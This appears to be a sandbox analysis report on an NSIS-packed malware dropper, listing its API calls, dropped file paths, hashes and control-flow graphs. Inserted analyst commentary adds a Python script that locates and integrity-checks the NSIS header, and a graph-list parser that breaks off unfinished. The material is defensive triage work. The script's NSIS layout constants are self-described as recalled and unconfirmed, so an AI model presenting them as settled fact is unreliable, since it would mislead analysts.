                                  • GetSystemMenu.USER32 ref: 00403C73
                                  • EnableMenuItem.USER32 ref: 00403C7A
                                  • SendMessageA.USER32 ref: 00403C92
                                  • SendMessageA.USER32 ref: 00403CA5
                                  • lstrlenA.KERNEL32(00420538,?,00420538,mrodzekle Setup), ref: 00403CCE
                                  • SetWindowTextA.USER32(?,00420538), ref: 00403CDD
                                  • ShowWindow.USER32(?,0000000A), ref: 00403E11
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                  • String ID: mrodzekle Setup
                                  • API String ID: 184305955-4007173231
                                  • Opcode ID: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                  • Instruction ID: 5fd13e9e65c650ae90d185cc2d11acb2e8fe01e0af56b63b73109b0399f4b85d
                                  • Opcode Fuzzy Hash: de2fcf6cdcd3bcc1c8429ee21d0de177b3c1a35057383903eb5d37bb8d4e0bda
                                  • Instruction Fuzzy Hash: EFC1CF71A04201BBDB20AF61ED85D2B7EBCEB4470AB40453EF541B51E1C73DAA429F5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 235 4035eb-403603 call 405f28 238 403605-403615 call 405af6 235->238 239 403617-40363e call 405a7f 235->239 248 403661-40368a call 4038b4 call 40576c 238->248 244 403640-403651 call 405a7f 239->244 245 403656-40365c lstrcatA 239->245 244->245 245->248 253 403690-403695 248->253 254 403711-403719 call 40576c 248->254 253->254 255 403697-4036bb call 405a7f 253->255 260 403727-40374c LoadImageA 254->260 261 40371b-403722 call 405bba 254->261 255->254 262 4036bd-4036bf 255->262 264 403752-403788 RegisterClassA 260->264 265 4037db-4037e3 call 40140b 260->265 261->260 266 4036d0-4036dc lstrlenA 262->266 267 4036c1-4036ce call 4056b6 262->267 268 4038aa 264->268 269 40378e-4037d6 SystemParametersInfoA CreateWindowExA 264->269 279 4037e5-4037e8 265->279 280 4037ed-4037f8 call 4038b4 265->280 273 403704-40370c call 40568b call 405b98 266->273 274 4036de-4036ec lstrcmpiA 266->274 267->266 272 4038ac-4038b3 268->272 269->265 273->254 274->273 278 4036ee-4036f8 GetFileAttributesA 274->278 283 4036fa-4036fc 278->283 284 4036fe-4036ff call 4056d2 278->284 279->272 288 403881-403889 call 404f56 280->288 289 4037fe-403818 ShowWindow call 405eba 280->289 283->273 283->284 284->273 294 4038a3-4038a5 call 40140b 288->294 295 40388b-403891 288->295 296 403824-403836 GetClassInfoA 289->296 297 40381a-40381f call 405eba 289->297 294->268 295->279 298 403897-40389e call 40140b 295->298 301 403838-403848 GetClassInfoA RegisterClassA 296->301 302 40384e-403871 DialogBoxParamA call 40140b 296->302 297->296 298->279 301->302 306 403876-40387f call 40353b 302->306 306->272
                                  APIs
                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                  • lstrcatA.KERNEL32(1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,C:\Users\user\AppData\Roaming\word.exe,00000000), ref: 0040365C
                                  • lstrlenA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 004036D1
                                  • lstrcmpiA.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,?,?,?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,C:\Users\user\AppData\Local\Temp,1033,00420538,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420538,00000000), ref: 004036E4
                                  • GetFileAttributesA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ), ref: 004036EF
                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403738
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  • RegisterClassA.USER32 ref: 0040377F
                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403797
                                  • CreateWindowExA.USER32 ref: 004037D0
                                  • ShowWindow.USER32(00000005,00000000), ref: 00403806
                                  • GetClassInfoA.USER32(00000000,RichEdit20A,004236E0), ref: 00403832
                                  • GetClassInfoA.USER32(00000000,RichEdit,004236E0), ref: 0040383F
                                  • RegisterClassA.USER32(004236E0), ref: 00403848
                                  • DialogBoxParamA.USER32 ref: 00403867
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\word.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$6B
                                  • API String ID: 1975747703-1136046952
                                  • Opcode ID: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                  • Instruction ID: 6624008b3449f808402c67b3262d240ca0850aee1e0dcbc9c28568ef27b6b269
                                  • Opcode Fuzzy Hash: 6d9bdf85a822e0f9bb9c4e2fcc7d2e939be480c33988b3e2c2e3dba5f36146f3
                                  • Instruction Fuzzy Hash: 6A61E9B17002047EE620AF619D45E3B7ABCEB4474AF40457FF941B22E2D77D9E428A2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 309 402c55-402ca3 GetTickCount GetModuleFileNameA call 40586f 312 402ca5-402caa 309->312 313 402caf-402cdd call 405b98 call 4056d2 call 405b98 GetFileSize 309->313 314 402e87-402e8b 312->314 321 402ce3 313->321 322 402dca-402dd8 call 402bf1 313->322 323 402ce8-402cff 321->323 329 402dda-402ddd 322->329 330 402e2d-402e32 322->330 325 402d01 323->325 326 402d03-402d05 call 403081 323->326 325->326 333 402d0a-402d0c 326->333 331 402e01-402e2b GlobalAlloc call 4030b3 call 402e8e 329->331 332 402ddf-402df0 call 4030b3 call 403081 329->332 330->314 331->330 360 402e3e-402e4f 331->360 349 402df5-402df7 332->349 335 402d12-402d19 333->335 336 402e34-402e3c call 402bf1 333->336 339 402d95-402d99 335->339 340 402d1b-402d2f call 405830 335->340 336->330 344 402da3-402da9 339->344 345 402d9b-402da2 call 402bf1 339->345 340->344 358 402d31-402d38 340->358 351 402db8-402dc2 344->351 352 402dab-402db5 call 405f97 344->352 345->344 349->330 355 402df9-402dff 349->355 351->323 359 402dc8 351->359 352->351 355->330 355->331 358->344 364 402d3a-402d41 358->364 359->322 361 402e51 360->361 362 402e57-402e5c 360->362 361->362 365 402e5d-402e63 362->365 364->344 366 402d43-402d4a 364->366 365->365 367 402e65-402e80 SetFilePointer call 405830 365->367 366->344 368 402d4c-402d53 366->368 371 402e85 367->371 368->344 370 402d55-402d75 368->370 370->330 372 402d7b-402d7f 370->372 371->314 373 402d81-402d85 372->373 374 402d87-402d8f 372->374 373->359 373->374 374->344 375 402d91-402d93 374->375 375->344
                                  APIs
                                  • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,?,00000000), ref: 00402C66
                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00402C82
                                    • Part of subcall function 0040586F: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                    • Part of subcall function 0040586F: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                  • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00402CCE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$pA
                                  • API String ID: 4283519449-2207440701
                                  • Opcode ID: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                  • Instruction ID: 62828f2e2b01cd2e9021f71d1007b468b6294b04ed91f3cf43b909f99e7c5814
                                  • Opcode Fuzzy Hash: d74ddf077dad9ccce0d63da47009af9ced08a9d3a58e0b3746407ee1fc4199ad
                                  • Instruction Fuzzy Hash: C151E371E00214ABDB209F64DE89B9E7BB4EF04355F20403BF904B62D1C7BC9E458A9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%
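                                   The function at 00402C55 above is the NSIS installer stub's startup routine: it takes its own path via GetModuleFileNameA, opens and sizes the file, then reads it in blocks comparing DWORDs against "Null", "soft" and "Inst" (the three strings in its string list), and either reports "Error launching installer" or "Installer integrity check has failed" (the NSIS_Error message also listed). The Python below is an added example, not code from this report or from NSIS, that reproduces that search and check so an analyst can locate the embedded installer data in a dropped NSIS binary such as word.exe. Assumptions, labelled in the code as well: the 28-byte firstheader layout (flags, 0xDEADBEEF, "NullsoftInst", length_of_header, length_of_all_following_data) and the flag values follow NSIS's exehead headers as I recall them; the 512-byte scan step and the rule "CRC32 over every byte preceding the trailing DWORD" reflect my reading of exehead's Main.c and should be confirmed against the NSIS source for the version in hand; the MZ stub and payload are constructed test data, not bytes from the sample.

```python
"""Locate and integrity-check an NSIS firstheader the way the exehead stub does.

Added example; the constants and layout are my recollection of NSIS's
Source/exehead/fileform.h and Main.c (assumption), not extracted from the sample.
"""
import struct
import zlib

FH_SIG = 0xDEADBEEF                       # siginfo DWORD checked by the stub
FH_NSINST = b"NullsoftInst"               # the 'Null', 'soft', 'Inst' DWORD compares
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8
FH_FLAGS_MASK = FH_FLAGS_UNINSTALL | FH_FLAGS_SILENT | FH_FLAGS_NO_CRC | FH_FLAGS_FORCE_CRC
# flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data (assumed layout)
FIRSTHEADER = struct.Struct("<II12sII")
SCAN_STEP = 512                           # exehead reads 512-byte blocks while searching (assumption)


class NsisError(Exception):
    """Raised with the same message text the stub shows in its error box."""


def find_firstheader(image: bytes):
    """Scan the image on 512-byte boundaries for a valid NSIS firstheader.

    Returns (offset, flags, length_of_header, length_of_all_following_data) or None.
    """
    for off in range(0, len(image) - FIRSTHEADER.size + 1, SCAN_STEP):
        flags, sig, nsinst, hdr_len, total_len = FIRSTHEADER.unpack_from(image, off)
        # Same three conditions the stub evaluates: no unknown flag bits, magic, 'NullsoftInst'.
        if sig == FH_SIG and nsinst == FH_NSINST and (flags & ~FH_FLAGS_MASK) == 0:
            return off, flags, hdr_len, total_len
    return None


def check_integrity(image: bytes) -> dict:
    """Mirror the stub's two failure paths and return the header facts on success."""
    found = find_firstheader(image)
    if found is None:
        raise NsisError("Error launching installer")          # no NSIS data block at all
    off, flags, hdr_len, total_len = found
    end = off + total_len
    if end > len(image):
        raise NsisError("Error launching installer")          # declared data runs past EOF
    result = {"offset": off, "flags": flags, "header_len": hdr_len,
              "total_len": total_len, "crc_checked": False}
    if flags & FH_FLAGS_NO_CRC:
        return result                                         # builder disabled the CRC
    # Assumption: trailing DWORD is a standard CRC-32 over everything before it.
    stored = struct.unpack_from("<I", image, end - 4)[0]
    computed = zlib.crc32(image[: end - 4]) & 0xFFFFFFFF
    if stored != computed:
        raise NsisError("Installer integrity check has failed")
    result["crc_checked"] = True
    return result


def build_sample_installer(flags: int = 0, payload: bytes = b"\x00" * 64) -> bytes:
    """Constructed test image: a fake 1024-byte 'stub' followed by an NSIS-style block.

    The MZ prefix is filler so the firstheader lands on a 512-byte boundary; it is
    not a real executable.
    """
    stub = b"MZ" + b"\x90" * 1022
    body_len = FIRSTHEADER.size + len(payload) + 4            # header + data + trailing CRC
    hdr = FIRSTHEADER.pack(flags, FH_SIG, FH_NSINST, len(payload), body_len)
    image = stub + hdr + payload
    crc = zlib.crc32(image) & 0xFFFFFFFF
    return image + struct.pack("<I", crc)


if __name__ == "__main__":
    good = build_sample_installer()
    print("intact image:", check_integrity(good))
    damaged = bytearray(good)
    damaged[1024 + FIRSTHEADER.size + 5] ^= 0xFF              # flip one payload byte
    try:
        check_integrity(bytes(damaged))
    except NsisError as err:
        print("damaged image:", err)
```

                                   Running it against a real NSIS-built dropper is a matter of passing the file bytes to check_integrity; the returned offset is where the compressed NSIS header and data block begin, which is the region to hand to an NSIS unpacker rather than the PE sections. The report's 00402C55 flow matches this shape: the "Null"/"soft"/"Inst" compares sit in the read loop, and the two error strings are the only exits before the installer header is processed.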

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 445 402e8e-402ea2 446 402ea4 445->446 447 402eab-402eb3 445->447 446->447 448 402eb5 447->448 449 402eba-402ebf 447->449 448->449 450 402ec1-402eca call 4030b3 449->450 451 402ecf-402edc call 403081 449->451 450->451 455 402ee2-402ee6 451->455 456 40302c 451->456 457 403015-403017 455->457 458 402eec-402f0c GetTickCount call 406005 455->458 459 40302e-40302f 456->459 460 403019-40301c 457->460 461 40306c-403070 457->461 469 403077 458->469 471 402f12-402f1a 458->471 463 40307a-40307e 459->463 466 403021-40302a call 403081 460->466 467 40301e 460->467 464 403031-403037 461->464 465 403072 461->465 472 403039 464->472 473 40303c-40304a call 403081 464->473 465->469 466->456 479 403074 466->479 467->466 469->463 476 402f1c 471->476 477 402f1f-402f2d call 403081 471->477 472->473 473->456 481 40304c-40305f WriteFile 473->481 476->477 477->456 483 402f33-402f3c 477->483 479->469 484 403011-403013 481->484 485 403061-403064 481->485 486 402f42-402f5f call 406025 483->486 484->459 485->484 487 403066-403069 485->487 490 402f65-402f7c GetTickCount 486->490 491 40300d-40300f 486->491 487->461 492 402fc1-402fc5 490->492 493 402f7e-402f86 490->493 491->459 496 403002-403005 492->496 497 402fc7-402fca 492->497 494 402f88-402f8c 493->494 495 402f8e-402fbe MulDiv wsprintfA call 404e84 493->495 494->492 494->495 495->492 496->471 498 40300b 496->498 500 402fea-402ff0 497->500 501 402fcc-402fde WriteFile 497->501 498->469 502 402ff6-402ffa 500->502 501->484 504 402fe0-402fe3 501->504 502->486 505 403000 502->505 504->484 506 402fe5-402fe8 504->506 505->469 506->502
                                  APIs
                                  • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EEC
                                  • GetTickCount.KERNEL32(0040B0E0,00004000), ref: 00402F6D
                                  • MulDiv.KERNEL32 ref: 00402F9A
                                  • wsprintfA.USER32 ref: 00402FAA
                                  • WriteFile.KERNELBASE(00000000,00000000,0040F0E0,00000000,00000000), ref: 00402FD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CountTick$FileWritewsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 4209647438-2449383134
                                  • Opcode ID: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                  • Instruction ID: 896dd5a5e80e39cb813739a9bcc38eeef40bacba50e05a76af68061f47ce39f0
                                  • Opcode Fuzzy Hash: b944acebcfd11712949cb6564d56ed346294539165133d47b9c6a5aca850bb39
                                  • Instruction Fuzzy Hash: 13518A3190120AABDF10DF65DA04AAF7BB8EB00395F14413BFD11B62C4D7789E41CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 507 401751-401774 call 402a29 call 4056f8 512 401776-40177c call 405b98 507->512 513 40177e-401790 call 405b98 call 40568b lstrcatA 507->513 518 401795-40179b call 405dfa 512->518 513->518 523 4017a0-4017a4 518->523 524 4017a6-4017b0 call 405e93 523->524 525 4017d7-4017da 523->525 533 4017c2-4017d4 524->533 534 4017b2-4017c0 CompareFileTime 524->534 526 4017e2-4017fe call 40586f 525->526 527 4017dc-4017dd call 405850 525->527 535 401800-401803 526->535 536 401876-40189f call 404e84 call 402e8e 526->536 527->526 533->525 534->533 537 401805-401847 call 405b98 * 2 call 405bba call 405b98 call 405459 535->537 538 401858-401862 call 404e84 535->538 550 4018a1-4018a5 536->550 551 4018a7-4018b3 SetFileTime 536->551 537->523 570 40184d-40184e 537->570 548 40186b-401871 538->548 553 4028c7 548->553 550->551 552 4018b9-4018c4 CloseHandle 550->552 551->552 555 4018ca-4018cd 552->555 556 4028be-4028c1 552->556 558 4028c9-4028cd 553->558 559 4018e2-4018e5 call 405bba 555->559 560 4018cf-4018e0 call 405bba lstrcatA 555->560 556->553 566 4018ea-402246 call 405459 559->566 560->566 566->556 566->558 570->548 572 401850-401851 570->572 572->538
                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00000000,00000000,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,mrodzekle Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                    • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                    • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                    • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                    • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $C:\Users\user\AppData\Local\Temp
                                  • API String ID: 1941528284-3798901881
                                  • Opcode ID: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                  • Instruction ID: ec6d4e4deed358595fa2340d5a7c786697911580d52a45c2a3a5a43c8a45cd53
                                  • Opcode Fuzzy Hash: 1d83eeb157989370eef6aca95033163bd7760edd2b6c2f47f904ee0373184e1d
                                  • Instruction Fuzzy Hash: 1C41E531900515BADF107FB5CC45EAF3679EF02329B60863BF425F10E2D67C9A418A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 574 405346-405391 CreateDirectoryA 575 405393-405395 574->575 576 405397-4053a4 GetLastError 574->576 578 4053be-4053c0 575->578 577 4053a6-4053ba SetFileSecurityA 576->577 576->578 577->575 579 4053bc GetLastError 577->579 579->578
                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 00405389
                                  • GetLastError.KERNEL32 ref: 0040539D
                                  • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004053B2
                                  • GetLastError.KERNEL32 ref: 004053BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\AppData\Roaming$Ls@$\s@
                                  • API String ID: 3449924974-4232301360
                                  • Opcode ID: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                  • Instruction ID: c25a7037d2469be4335b8e9940eeaad57ca25a66f44a15dc7ff8fd6819e2376f
                                  • Opcode Fuzzy Hash: 6211b517ce48024f91031cad3a720f7e2baa8210faa46a43940225e11b136f78
                                  • Instruction Fuzzy Hash: 030108B1D14219EAEF119FA4CC047EFBFB8EB14354F004176D904B6280D7B8A604DFAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 580 405eba-405eda GetSystemDirectoryA 581 405edc 580->581 582 405ede-405ee0 580->582 581->582 583 405ef0-405ef2 582->583 584 405ee2-405eea 582->584 585 405ef3-405f25 wsprintfA LoadLibraryExA 583->585 584->583 586 405eec-405eee 584->586 586->585
                                  APIs
                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                  • wsprintfA.USER32 ref: 00405F0A
                                  • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                   • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%s.dll$UXTHEME$\
                                  • API String ID: 2200240437-4240819195
                                  • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                  • Instruction ID: e0394f74180a6a16eba84a37178681bb1de021cb3750537530e5e19d16d25b78
                                  • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                  • Instruction Fuzzy Hash: AFF09C3094050967DB159B68DD0DFFB365CF708305F1405B7B586E11C2DA74E9158FD9
                                  Uniqueness

                                  Uniqueness Score: -1.00%
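The control_flow_graph lines in these function records are a flattened edge list (decimal node id, lowercase hex address or address range, optional API or "call <addr>" labels, then src->dst edges) that is hard to read or diff by eye once the rendered graph is gone. The parser below is an added example and is not part of the Joe Sandbox report or its tooling; it assumes only the token shapes visible on this page and uses the two shorter graphs above (the CreateDirectoryA helper and the UXTHEME loader) as input, copied verbatim from the report.

```python
"""Parse the flattened control_flow_graph edge lists that Joe Sandbox prints per function."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Token shapes seen on this page: node = "<id> <hexstart>[-<hexend>] [labels...]", edge = "<src>-><dst>".
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")

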